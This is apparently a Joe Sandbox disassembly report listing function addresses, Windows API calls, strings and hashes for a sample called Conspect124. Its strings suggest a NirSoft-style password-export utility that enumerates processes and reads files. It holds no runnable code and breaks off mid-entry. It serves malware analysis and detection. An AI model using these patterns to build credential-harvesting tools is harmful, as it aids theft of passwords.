                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@??3@_snwprintfwcscpy
                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                      • API String ID: 2899246560-1542517562
                                      • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                      • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                      Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0040DBCD
                                      • memset.MSVCRT ref: 0040DBE9
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                      • wcscpy.MSVCRT ref: 0040DC2D
                                      • wcscpy.MSVCRT ref: 0040DC3C
                                      • wcscpy.MSVCRT ref: 0040DC4C
                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                      • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                      • wcscpy.MSVCRT ref: 0040DCC3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                      • API String ID: 3330709923-517860148
                                      • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                      • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                      • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                      • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                      Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • memset.MSVCRT ref: 004085CF
                                      • memset.MSVCRT ref: 004085F1
                                      • memset.MSVCRT ref: 00408606
                                      • strcmp.MSVCRT ref: 00408645
                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                      • memset.MSVCRT ref: 0040870E
                                      • strcmp.MSVCRT ref: 0040876B
                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                      • String ID: ---
                                      • API String ID: 3437578500-2854292027
                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                      Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 0041087D
                                      • memset.MSVCRT ref: 00410892
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                      • DeleteObject.GDI32(?), ref: 004109D0
                                      • DeleteObject.GDI32(?), ref: 004109D6
                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                      • String ID:
                                      • API String ID: 1010922700-0
                                      • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                      • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                      Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                      • malloc.MSVCRT ref: 004186B7
                                      • free.MSVCRT ref: 004186C7
                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                      • free.MSVCRT ref: 004186E0
                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                      • malloc.MSVCRT ref: 004186FE
                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                      • free.MSVCRT ref: 00418716
                                      • free.MSVCRT ref: 0041872A
                                      • free.MSVCRT ref: 00418749
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: free$FullNamePath$malloc$Version
                                      • String ID: |A
                                      • API String ID: 3356672799-1717621600
                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                      Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                      • API String ID: 2081463915-1959339147
                                      • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                      • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                      Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                      • API String ID: 2012295524-70141382
                                      • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                      • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                      Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                      • API String ID: 667068680-3953557276
                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                      Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 004121FF
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                      • SelectObject.GDI32(?,?), ref: 00412251
                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                      • SetCursor.USER32(00000000), ref: 004122BC
                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                      • String ID:
                                      • API String ID: 1700100422-0
                                      • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                      • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                      Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                      • String ID:
                                      • API String ID: 552707033-0
                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                      Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                      • strchr.MSVCRT ref: 0040C140
                                      • strchr.MSVCRT ref: 0040C151
                                      • _strlwr.MSVCRT ref: 0040C15F
                                      • memset.MSVCRT ref: 0040C17A
                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                      • String ID: 4$h
                                      • API String ID: 4066021378-1856150674
                                      • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                      • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                      • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                      • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                      Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf
                                      • String ID: %%0.%df
                                      • API String ID: 3473751417-763548558
                                      • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                      • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                      Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                      • GetTickCount.KERNEL32 ref: 0040610B
                                      • GetParent.USER32(?), ref: 00406136
                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                      • String ID: A
                                      • API String ID: 2892645895-3554254475
                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                      Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                      • memset.MSVCRT ref: 0040DA23
                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                      • String ID: caption
                                      • API String ID: 973020956-4135340389
                                      • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                      • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                      Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
